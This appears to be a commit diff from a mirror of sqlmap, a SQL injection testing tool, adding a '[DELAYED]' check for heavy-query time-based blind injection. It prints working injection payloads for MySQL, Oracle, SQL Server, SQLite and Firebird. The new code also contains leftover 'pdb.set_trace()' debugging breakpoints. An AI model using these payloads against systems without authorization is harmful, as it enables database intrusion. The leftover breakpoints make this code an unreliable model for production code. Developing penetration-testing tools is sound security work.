mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-26 11:33:47 +03:00
introducing [DELAYED] for heavy query time based payloads when response time is non-deterministic
This commit is contained in:
parent
32f1909131
commit
61f82fd274
|
@ -45,6 +45,8 @@ from lib.core.exception import sqlmapSiteTooDynamic
|
|||
from lib.core.exception import sqlmapUserQuitException
|
||||
from lib.core.session import setString
|
||||
from lib.core.session import setRegexp
|
||||
from lib.core.settings import TIME_MIN_DELTA
|
||||
from lib.core.settings import TIME_N_RESPONSE
|
||||
from lib.request.connect import Connect as Request
|
||||
from plugins.dbms.firebird.syntax import Syntax as Firebird
|
||||
from plugins.dbms.postgresql.syntax import Syntax as PostgreSQL
|
||||
|
@ -351,11 +353,23 @@ def checkSqlInjection(place, parameter, value):
|
|||
_ = Request.queryPage(reqPayload, place)
|
||||
duration = calculateDeltaSeconds(start)
|
||||
|
||||
if duration >= conf.timeSec:
|
||||
if check.isdigit():
|
||||
if duration >= int(check):
|
||||
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
|
||||
logger.info(infoMsg)
|
||||
|
||||
injectable = True
|
||||
elif check == "[DELAYED]":
|
||||
if duration >= max(TIME_MIN_DELTA, TIME_N_RESPONSE * kb.responseTime):
|
||||
import pdb
|
||||
pdb.set_trace()
|
||||
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
|
||||
logger.info(infoMsg)
|
||||
|
||||
injectable = True
|
||||
else:
|
||||
import pdb
|
||||
pdb.set_trace()
|
||||
# Restore old value of socket timeout
|
||||
socket.setdefaulttimeout(popValue())
|
||||
|
||||
|
|
|
@ -1281,7 +1281,7 @@ def calculateDeltaSeconds(start, epsilon=0.1):
|
|||
Returns elapsed time from start till now (including expected
|
||||
error set by epsilon parameter)
|
||||
"""
|
||||
return int(time.time() - start - kb.responseTime + epsilon)
|
||||
return time.time() - start - kb.responseTime + epsilon
|
||||
|
||||
def initCommonOutputs():
|
||||
kb.commonOutputs = {}
|
||||
|
|
|
@ -48,6 +48,11 @@ DUMP_STOP_MARKER = "__STOP__"
|
|||
|
||||
PAYLOAD_DELIMITER = "\x00"
|
||||
|
||||
# settings used for delayed time payloads
|
||||
TIME_MIN_DELTA = 1 # minimum difference of loading time in seconds
|
||||
TIME_N_RESPONSE = 3 # minimum multiplicant of response time
|
||||
|
||||
|
||||
# System variables
|
||||
IS_WIN = subprocess.mswindows
|
||||
# The name of the operating system dependent module imported. The following
|
||||
|
|
|
@ -1232,7 +1232,7 @@ Formats:
|
|||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
|
@ -1271,7 +1271,7 @@ Formats:
|
|||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
|
@ -1388,7 +1388,7 @@ Formats:
|
|||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>SQLite</dbms>
|
||||
|
@ -1408,7 +1408,7 @@ Formats:
|
|||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Firebird</dbms>
|
||||
|
@ -1452,7 +1452,7 @@ Formats:
|
|||
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
|
@ -1484,29 +1484,11 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<request>
|
||||
<payload>AND (SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM DUAL)>0</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle AND time-based blind (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<request>
|
||||
<payload>AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
|
@ -1524,7 +1506,7 @@ Formats:
|
|||
<payload>AND (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Microsoft SQL Server</dbms>
|
||||
|
@ -1532,7 +1514,7 @@ Formats:
|
|||
</test>
|
||||
|
||||
<test>
|
||||
<title>SQLite > 2.0 AND time-based blind (heavy query)</title>
|
||||
<title>SQLite > 2.0 AND time-based blind</title>
|
||||
<stype>5</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
|
@ -1543,7 +1525,7 @@ Formats:
|
|||
<payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>SQLite</dbms>
|
||||
|
@ -1563,7 +1545,7 @@ Formats:
|
|||
<payload>AND (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Firebird</dbms>
|
||||
|
@ -1611,7 +1593,7 @@ Formats:
|
|||
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
|
@ -1647,7 +1629,7 @@ Formats:
|
|||
<payload>OR (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
|
@ -1665,7 +1647,7 @@ Formats:
|
|||
<payload>OR (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Microsoft SQL Server</dbms>
|
||||
|
@ -1673,7 +1655,7 @@ Formats:
|
|||
</test>
|
||||
|
||||
<test>
|
||||
<title>SQLite > 2.0 OR time-based blind (heavy query)</title>
|
||||
<title>SQLite > 2.0 OR time-based blind</title>
|
||||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
|
@ -1684,7 +1666,7 @@ Formats:
|
|||
<payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>SQLite</dbms>
|
||||
|
@ -1704,7 +1686,7 @@ Formats:
|
|||
<payload>OR (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Firebird</dbms>
|
||||
|
|
Loading…
Reference in New Issue
Block a user